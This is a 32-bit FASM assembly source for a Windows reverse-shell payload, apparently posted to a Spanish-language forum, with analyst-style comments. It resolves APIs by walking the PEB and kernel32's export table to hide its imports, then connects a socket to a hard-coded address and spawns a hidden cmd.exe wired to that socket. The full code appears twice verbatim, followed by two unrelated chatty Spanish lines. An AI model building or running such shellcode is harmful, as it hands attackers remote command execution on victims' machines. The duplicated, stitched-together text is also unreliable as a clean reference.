include 'C:\fasm\INCLUDE\win32ax.inc'
;-----------------------------------------------------------------------
; start -- Win32 reverse-shell payload (fasm, Intel syntax, 32-bit stdcall)
;
; Review notes for analysts:
;   * Imports are resolved at run time: the PEB loader list is walked to a
;     module taken to be kernel32.dll, its export directory is parsed by
;     hand for GetProcAddress, and the rest is looked up from there. The
;     binary therefore carries no import entries for the APIs it uses.
;   * Sequence: LoadLibraryA("ws2_32.dll"), WSAStartup, WSASocketA,
;     connect to IP:PORT, CreateProcessA("cmd.exe") with bInheritHandles=1
;     and all three std handles set to the socket (STARTF_USESTDHANDLES);
;     the window is hidden (STARTF_USESHOWWINDOW with wShowWindow left 0).
;   * No return value is checked; there is no epilogue and no exit call,
;     so after the final CreateProcessA execution falls through past the
;     end of this block.
;   * Detection anchors visible here: the fs:[30h] read, the manual
;     export-table walk, the LoadLibraryA/WSASocketA/connect/CreateProcessA
;     chain, and a cmd.exe child whose std handles are a socket. Egress
;     filtering of the hard-coded IP:PORT blocks the callback itself.
;
; Frame (relative to ebp; 1024 bytes reserved below it):
;   -4     kernel32 base, later overwritten with CreateProcessA
;   -8     ws2_32 base,   later overwritten with connect
;   -12    WSAStartup
;   -16    WSASocketA
;   -20..-16  scratch for API-name strings built on the stack
;   -32    GetProcAddress, until the sockaddr_in below overlays it
;   -32    sockaddr_in          (16 bytes, -32..-17)
;   -100   STARTUPINFO          (68 bytes)
;   -116   PROCESS_INFORMATION  (16 bytes)
;   -120   SOCKET
;   -520   WSADATA              (400 bytes)
;   -528   "cmd.exe\0"
;-----------------------------------------------------------------------
IP EQU 127 + 1*256*256*256 ; 0x0100007F -> bytes 7F 00 00 01 = 127.0.0.1 as an in_addr
PORT EQU 8000h ; stored into sin_port as-is (no htons): wire bytes 00 80 = port 128
Size_of_WSADATA EQU 400 ; sizeof(WSADATA), 32-bit layout
Size_of_SOCKET EQU 4
Size_of_PROCESS_INFORMATION EQU 16
Size_of_STARTUPINFO EQU 68 ; sizeof(STARTUPINFOA), 32-bit layout
Size_of_sockaddr_in EQU 16
AF_INET EQU 2
SOCK_STREAM EQU 1
.code
start:
push ebp
mov ebp, esp
sub esp, 1024 ; room for every buffer in the frame layout above
; --- 1. locate kernel32.dll through the PEB loader data ----------------
db 64h, 0A1h, 30h, 0h, 0h, 0h ;mov eax, fs:[30h] -> PEB (hand-encoded; fasm can assemble the mnemonic directly)
mov eax, [eax + 0Ch] ; PEB->Ldr
mov esi, [eax + 1Ch] ; Ldr->InInitializationOrderModuleList.Flink (1st entry)
lodsd ; eax = 2nd entry of that list (Flink of the 1st)
mov ebx, [eax + 08h] ; DllBase of that entry. NOTE(review): assumed to be kernel32.dll; which module sits 2nd in init order is not guaranteed across Windows versions - confirm for the target build
mov [ebp - 4], ebx ;[ebp - 4] = kernel32.dll base
; --- 2. find GetProcAddress in kernel32's export directory -------------
mov ecx, [ebx + 3Ch] ; e_lfanew
add ecx, ebx ;ecx = IMAGE_NT_HEADERS
mov ecx, [ecx + 78h] ; DataDirectory[EXPORT].VirtualAddress
add ecx, ebx ;ecx = IMAGE_EXPORT_DIRECTORY
mov esi, [ecx + 20h] ; AddressOfNames (RVA)
add esi, ebx ;esi -> AddressOfNames[0]
xor edx, edx ; edx = name counter; 1-based once the loop has run
cld ; lodsd must walk forward
Find_GetProcAddress:
inc edx
lodsd ; eax = RVA of the next exported name
add eax, ebx
cmp dword [eax], "GetP" ; 12-byte prefix compare for "GetProcAddre"; the terminator is never checked (names are sorted, so GetProcAddress itself matches first)
jne Find_GetProcAddress
cmp dword [eax + 4], "rocA"
jne Find_GetProcAddress
cmp dword [eax + 8], "ddre"
jne Find_GetProcAddress ; no NumberOfNames bound: a table without this name would be walked past its end
mov esi, [ecx + 24h] ; AddressOfNameOrdinals (RVA)
add esi, ebx
add esi, edx
add esi, edx ; esi -> ordinals[edx]; edx is 1-based, so this is the entry AFTER the matched name
lodsd ; low word = that ordinal (high word is the following entry, discarded below)
xor esi, esi
mov si, ax
dec esi ; esi = ordinals[k+1] - 1. NOTE(review): equals ordinals[k] only when the ordinal table is sequential, which kernel32's normally is - confirm rather than rely on it
mov edx, [ecx + 1Ch] ; AddressOfFunctions (RVA)
add edx, ebx
shl esi, 2 ; index * sizeof(DWORD)
add esi, edx
lodsd ; RVA of GetProcAddress
add eax, ebx
mov [ebp - 32], eax ;[ebp - 32] = GetProcAddress
; --- 3. resolve the remaining APIs via GetProcAddress ------------------
; Names are written onto the stack as dword fragments; a fragment shorter
; than 4 bytes (e.g. "up") is zero-extended by fasm, which supplies the
; NUL terminator. All calls are stdcall, so no stack clean-up follows.
mov dword [ebp - 20], "Load"
mov dword [ebp - 16], "Libr"
mov dword [ebp - 12], "aryA"
mov dword [ebp - 8], 0 ; NUL terminator for "LoadLibraryA"
lea ecx, [ebp - 20]
push ecx ; lpProcName = "LoadLibraryA"
push ebx ; hModule = kernel32
call eax ;GetProcAddress(kernel32, "LoadLibraryA") -> eax = LoadLibraryA
mov dword [ebp - 16], "ws2_"
mov dword [ebp - 12], "32.d"
mov dword [ebp - 8], "ll"
lea ecx, [ebp - 16]
push ecx ; lpLibFileName = "ws2_32.dll"
call eax ;LoadLibraryA("ws2_32.dll")
mov [ebp - 8], eax ;[ebp - 8] = ws2_32.dll base (overwrites the "ll" scratch)
mov dword [ebp - 20], "WSAS"
mov dword [ebp - 16], "tart"
mov dword [ebp - 12], "up"
lea ecx, [ebp - 20]
mov ebx, [ebp - 32] ; ebx = GetProcAddress
push ecx
push eax ; hModule = ws2_32 (still in eax from LoadLibraryA)
call ebx
mov [ebp - 12], eax ;[ebp - 12] = WSAStartup
mov dword [ebp - 28], "Crea"
mov dword [ebp - 24], "tePr"
mov dword [ebp - 20], "oces"
mov dword [ebp - 16], "sA"
lea ecx, [ebp - 28]
mov ebx, [ebp - 4] ; ebx = kernel32
mov eax, [ebp - 32] ; eax = GetProcAddress
push ecx
push ebx
call eax
mov [ebp - 4], eax ;[ebp - 4] = CreateProcessA (kernel32 base no longer needed)
mov dword [ebp - 24], "WSAS"
mov dword [ebp - 20], "ocke"
mov dword [ebp - 16], "tA"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8] ; ebx = ws2_32
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 16], eax ;[ebp - 16] = WSASocketA
mov dword [ebp - 24], "conn"
mov dword [ebp - 20], "ect"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 8], eax ;[ebp - 8] = connect (ws2_32 base no longer needed)
;Now we have on the stack the four APIs that the reverse shell will use:
;[ebp - 4] ------------------------> CreateProcessA
;[ebp - 8] ------------------------> connect
;[ebp - 12] ------------------------> WSAStartup
;[ebp - 16] ------------------------> WSASocketA
;The following C code is what the asm below translates:
;WSADATA wsaData;
;SOCKET hSocket;
;STARTUPINFO si;
;PROCESS_INFORMATION pi;
;struct sockaddr_in adik_sin;
;memset(&adik_sin, 0, sizeof(adik_sin));
;memset(&si, 0, sizeof(si));
;WSAStartup(MAKEWORD(2,0), &wsaData);
;hSocket = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
;adik_sin.sin_family = AF_INET;
;adik_sin.sin_port = htons(Port);   (the asm stores PORT without the byte swap)
;adik_sin.sin_addr.s_addr = inet_addr(IP);
;connect(hSocket, (struct sockaddr*)&adik_sin, sizeof(adik_sin));
;si.cb = sizeof(si);
;si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
;si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
;CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &si, &pi);
; --- 4. zero sockaddr_in and STARTUPINFO (84 bytes, -100..-17) ---------
cld
mov ecx, (Size_of_sockaddr_in + Size_of_STARTUPINFO)/4 ; 21 dwords
lea ebx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO] ; ebx -> STARTUPINFO, the lower of the two buffers
Put_zero:
mov dword [ebx], 0
add ebx, 4
loop Put_zero ; also wipes the GetProcAddress slot at [ebp - 32], which is no longer needed
; --- 5. WSAStartup(MAKEWORD(2,0), &wsaData) ----------------------------
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA] ; &wsaData
mov ebx, [ebp - 12] ; WSAStartup
push ecx ; lpWSAData
push 2 ; wVersionRequested = MAKEWORD(2,0)
call ebx ; return value ignored
; --- 6. hSocket = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0) ---------
mov ebx, [ebp - 16] ; WSASocketA
push 0 ; dwFlags
push 0 ; g
push 0 ; lpProtocolInfo
push 0 ; protocol
push SOCK_STREAM
push AF_INET
call ebx
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET], eax ; hSocket (never checked for INVALID_SOCKET)
; --- 7. fill sockaddr_in and connect ------------------------------------
mov word [ebp - 16 - Size_of_sockaddr_in], AF_INET ; sin_family
mov word [ebp - 16 - Size_of_sockaddr_in + 2], PORT ; sin_port, raw little-endian word: on the wire 00 80 = port 128, not 0x8000
mov dword [ebp - 16 - Size_of_sockaddr_in + 4], IP ; sin_addr = 127.0.0.1
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET] ; hSocket
lea ecx, [ebp - 16 - Size_of_sockaddr_in] ; &adik_sin
mov ebx, [ebp - 8] ; connect
push Size_of_sockaddr_in ; namelen
push ecx ; name
push eax ; s
call ebx ; return value ignored: on failure cmd.exe is still spawned with the unconnected socket as its std handles
; --- 8. STARTUPINFO: cb, flags, std handles = socket --------------------
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO], Size_of_STARTUPINFO ; si.cb
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 44], 257; si.dwFlags = STARTF_USESTDHANDLES (100h) + STARTF_USESHOWWINDOW (1); wShowWindow at +48 stays 0 (SW_HIDE) from the zeroing loop
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET] ; hSocket
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 56], eax ; si.hStdInput
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 60], eax ; si.hStdOutput
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 64], eax ; si.hStdError
; --- 9. CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8], "cmd."
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 4], "exe" ; zero-extended by fasm -> "cmd.exe\0"
lea edx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8] ; lpCommandLine
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO] ; &si
lea eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION] ; &pi
mov ebx, [ebp - 4] ; CreateProcessA
push eax ; lpProcessInformation
push ecx ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 0 ; dwCreationFlags
push 1 ; bInheritHandles = TRUE, so the child receives the socket as its std handles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
push edx ; lpCommandLine = "cmd.exe"
push 0 ; lpApplicationName
call ebx ; no epilogue and no ExitProcess: execution continues past this point into whatever follows in memory
;-----------------------------------------------------------------------
; start -- Win32 reverse-shell payload (fasm, Intel syntax, 32-bit stdcall)
;
; Review notes for analysts:
;   * Imports are resolved at run time: the PEB loader list is walked to a
;     module taken to be kernel32.dll, its export directory is parsed by
;     hand for GetProcAddress, and the rest is looked up from there. The
;     binary therefore carries no import entries for the APIs it uses.
;   * Sequence: LoadLibraryA("ws2_32.dll"), WSAStartup, WSASocketA,
;     connect to IP:PORT, CreateProcessA("cmd.exe") with bInheritHandles=1
;     and all three std handles set to the socket (STARTF_USESTDHANDLES);
;     the window is hidden (STARTF_USESHOWWINDOW with wShowWindow left 0).
;   * No return value is checked; there is no epilogue and no exit call,
;     so after the final CreateProcessA execution falls through past the
;     end of this block.
;   * Detection anchors visible here: the fs:[30h] read, the manual
;     export-table walk, the LoadLibraryA/WSASocketA/connect/CreateProcessA
;     chain, and a cmd.exe child whose std handles are a socket. Egress
;     filtering of the hard-coded IP:PORT blocks the callback itself.
;
; Frame (relative to ebp; 1024 bytes reserved below it):
;   -4     kernel32 base, later overwritten with CreateProcessA
;   -8     ws2_32 base,   later overwritten with connect
;   -12    WSAStartup
;   -16    WSASocketA
;   -20..-16  scratch for API-name strings built on the stack
;   -32    GetProcAddress, until the sockaddr_in below overlays it
;   -32    sockaddr_in          (16 bytes, -32..-17)
;   -100   STARTUPINFO          (68 bytes)
;   -116   PROCESS_INFORMATION  (16 bytes)
;   -120   SOCKET
;   -520   WSADATA              (400 bytes)
;   -528   "cmd.exe\0"
;-----------------------------------------------------------------------
IP EQU 127 + 1*256*256*256 ; 0x0100007F -> bytes 7F 00 00 01 = 127.0.0.1 as an in_addr
PORT EQU 8000h ; stored into sin_port as-is (no htons): wire bytes 00 80 = port 128
Size_of_WSADATA EQU 400 ; sizeof(WSADATA), 32-bit layout
Size_of_SOCKET EQU 4
Size_of_PROCESS_INFORMATION EQU 16
Size_of_STARTUPINFO EQU 68 ; sizeof(STARTUPINFOA), 32-bit layout
Size_of_sockaddr_in EQU 16
AF_INET EQU 2
SOCK_STREAM EQU 1
.code
start:
push ebp
mov ebp, esp
sub esp, 1024 ; room for every buffer in the frame layout above
; --- 1. locate kernel32.dll through the PEB loader data ----------------
db 64h, 0A1h, 30h, 0h, 0h, 0h ;mov eax, fs:[30h] -> PEB (hand-encoded; fasm can assemble the mnemonic directly)
mov eax, [eax + 0Ch] ; PEB->Ldr
mov esi, [eax + 1Ch] ; Ldr->InInitializationOrderModuleList.Flink (1st entry)
lodsd ; eax = 2nd entry of that list (Flink of the 1st)
mov ebx, [eax + 08h] ; DllBase of that entry. NOTE(review): assumed to be kernel32.dll; which module sits 2nd in init order is not guaranteed across Windows versions - confirm for the target build
mov [ebp - 4], ebx ;[ebp - 4] = kernel32.dll base
; --- 2. find GetProcAddress in kernel32's export directory -------------
mov ecx, [ebx + 3Ch] ; e_lfanew
add ecx, ebx ;ecx = IMAGE_NT_HEADERS
mov ecx, [ecx + 78h] ; DataDirectory[EXPORT].VirtualAddress
add ecx, ebx ;ecx = IMAGE_EXPORT_DIRECTORY
mov esi, [ecx + 20h] ; AddressOfNames (RVA)
add esi, ebx ;esi -> AddressOfNames[0]
xor edx, edx ; edx = name counter; 1-based once the loop has run
cld ; lodsd must walk forward
Find_GetProcAddress:
inc edx
lodsd ; eax = RVA of the next exported name
add eax, ebx
cmp dword [eax], "GetP" ; 12-byte prefix compare for "GetProcAddre"; the terminator is never checked (names are sorted, so GetProcAddress itself matches first)
jne Find_GetProcAddress
cmp dword [eax + 4], "rocA"
jne Find_GetProcAddress
cmp dword [eax + 8], "ddre"
jne Find_GetProcAddress ; no NumberOfNames bound: a table without this name would be walked past its end
mov esi, [ecx + 24h] ; AddressOfNameOrdinals (RVA)
add esi, ebx
add esi, edx
add esi, edx ; esi -> ordinals[edx]; edx is 1-based, so this is the entry AFTER the matched name
lodsd ; low word = that ordinal (high word is the following entry, discarded below)
xor esi, esi
mov si, ax
dec esi ; esi = ordinals[k+1] - 1. NOTE(review): equals ordinals[k] only when the ordinal table is sequential, which kernel32's normally is - confirm rather than rely on it
mov edx, [ecx + 1Ch] ; AddressOfFunctions (RVA)
add edx, ebx
shl esi, 2 ; index * sizeof(DWORD)
add esi, edx
lodsd ; RVA of GetProcAddress
add eax, ebx
mov [ebp - 32], eax ;[ebp - 32] = GetProcAddress
; --- 3. resolve the remaining APIs via GetProcAddress ------------------
; Names are written onto the stack as dword fragments; a fragment shorter
; than 4 bytes (e.g. "up") is zero-extended by fasm, which supplies the
; NUL terminator. All calls are stdcall, so no stack clean-up follows.
mov dword [ebp - 20], "Load"
mov dword [ebp - 16], "Libr"
mov dword [ebp - 12], "aryA"
mov dword [ebp - 8], 0 ; NUL terminator for "LoadLibraryA"
lea ecx, [ebp - 20]
push ecx ; lpProcName = "LoadLibraryA"
push ebx ; hModule = kernel32
call eax ;GetProcAddress(kernel32, "LoadLibraryA") -> eax = LoadLibraryA
mov dword [ebp - 16], "ws2_"
mov dword [ebp - 12], "32.d"
mov dword [ebp - 8], "ll"
lea ecx, [ebp - 16]
push ecx ; lpLibFileName = "ws2_32.dll"
call eax ;LoadLibraryA("ws2_32.dll")
mov [ebp - 8], eax ;[ebp - 8] = ws2_32.dll base (overwrites the "ll" scratch)
mov dword [ebp - 20], "WSAS"
mov dword [ebp - 16], "tart"
mov dword [ebp - 12], "up"
lea ecx, [ebp - 20]
mov ebx, [ebp - 32] ; ebx = GetProcAddress
push ecx
push eax ; hModule = ws2_32 (still in eax from LoadLibraryA)
call ebx
mov [ebp - 12], eax ;[ebp - 12] = WSAStartup
mov dword [ebp - 28], "Crea"
mov dword [ebp - 24], "tePr"
mov dword [ebp - 20], "oces"
mov dword [ebp - 16], "sA"
lea ecx, [ebp - 28]
mov ebx, [ebp - 4] ; ebx = kernel32
mov eax, [ebp - 32] ; eax = GetProcAddress
push ecx
push ebx
call eax
mov [ebp - 4], eax ;[ebp - 4] = CreateProcessA (kernel32 base no longer needed)
mov dword [ebp - 24], "WSAS"
mov dword [ebp - 20], "ocke"
mov dword [ebp - 16], "tA"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8] ; ebx = ws2_32
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 16], eax ;[ebp - 16] = WSASocketA
mov dword [ebp - 24], "conn"
mov dword [ebp - 20], "ect"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 8], eax ;[ebp - 8] = connect (ws2_32 base no longer needed)
;Now we have on the stack the four APIs that the reverse shell will use:
;[ebp - 4] ------------------------> CreateProcessA
;[ebp - 8] ------------------------> connect
;[ebp - 12] ------------------------> WSAStartup
;[ebp - 16] ------------------------> WSASocketA
;The following C code is what the asm below translates:
;WSADATA wsaData;
;SOCKET hSocket;
;STARTUPINFO si;
;PROCESS_INFORMATION pi;
;struct sockaddr_in adik_sin;
;memset(&adik_sin, 0, sizeof(adik_sin));
;memset(&si, 0, sizeof(si));
;WSAStartup(MAKEWORD(2,0), &wsaData);
;hSocket = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
;adik_sin.sin_family = AF_INET;
;adik_sin.sin_port = htons(Port);   (the asm stores PORT without the byte swap)
;adik_sin.sin_addr.s_addr = inet_addr(IP);
;connect(hSocket, (struct sockaddr*)&adik_sin, sizeof(adik_sin));
;si.cb = sizeof(si);
;si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
;si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
;CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &si, &pi);
; --- 4. zero sockaddr_in and STARTUPINFO (84 bytes, -100..-17) ---------
cld
mov ecx, (Size_of_sockaddr_in + Size_of_STARTUPINFO)/4 ; 21 dwords
lea ebx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO] ; ebx -> STARTUPINFO, the lower of the two buffers
Put_zero:
mov dword [ebx], 0
add ebx, 4
loop Put_zero ; also wipes the GetProcAddress slot at [ebp - 32], which is no longer needed
; --- 5. WSAStartup(MAKEWORD(2,0), &wsaData) ----------------------------
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA] ; &wsaData
mov ebx, [ebp - 12] ; WSAStartup
push ecx ; lpWSAData
push 2 ; wVersionRequested = MAKEWORD(2,0)
call ebx ; return value ignored
; --- 6. hSocket = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0) ---------
mov ebx, [ebp - 16] ; WSASocketA
push 0 ; dwFlags
push 0 ; g
push 0 ; lpProtocolInfo
push 0 ; protocol
push SOCK_STREAM
push AF_INET
call ebx
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET], eax ; hSocket (never checked for INVALID_SOCKET)
; --- 7. fill sockaddr_in and connect ------------------------------------
mov word [ebp - 16 - Size_of_sockaddr_in], AF_INET ; sin_family
mov word [ebp - 16 - Size_of_sockaddr_in + 2], PORT ; sin_port, raw little-endian word: on the wire 00 80 = port 128, not 0x8000
mov dword [ebp - 16 - Size_of_sockaddr_in + 4], IP ; sin_addr = 127.0.0.1
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET] ; hSocket
lea ecx, [ebp - 16 - Size_of_sockaddr_in] ; &adik_sin
mov ebx, [ebp - 8] ; connect
push Size_of_sockaddr_in ; namelen
push ecx ; name
push eax ; s
call ebx ; return value ignored: on failure cmd.exe is still spawned with the unconnected socket as its std handles
; --- 8. STARTUPINFO: cb, flags, std handles = socket --------------------
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO], Size_of_STARTUPINFO ; si.cb
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 44], 257; si.dwFlags = STARTF_USESTDHANDLES (100h) + STARTF_USESHOWWINDOW (1); wShowWindow at +48 stays 0 (SW_HIDE) from the zeroing loop
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET] ; hSocket
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 56], eax ; si.hStdInput
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 60], eax ; si.hStdOutput
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 64], eax ; si.hStdError
; --- 9. CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8], "cmd."
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 4], "exe" ; zero-extended by fasm -> "cmd.exe\0"
lea edx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8] ; lpCommandLine
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO] ; &si
lea eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION] ; &pi
mov ebx, [ebp - 4] ; CreateProcessA
push eax ; lpProcessInformation
push ecx ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 0 ; dwCreationFlags
push 1 ; bInheritHandles = TRUE, so the child receives the socket as its std handles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
push edx ; lpCommandLine = "cmd.exe"
push 0 ; lpApplicationName
call ebx ; no epilogue and no ExitProcess: execution continues past this point into whatever follows in memory
Y tras este aporte me voy a emborrachar y a que me dé el aire.






















En Windows hay que andar buscando todas las syscalls.
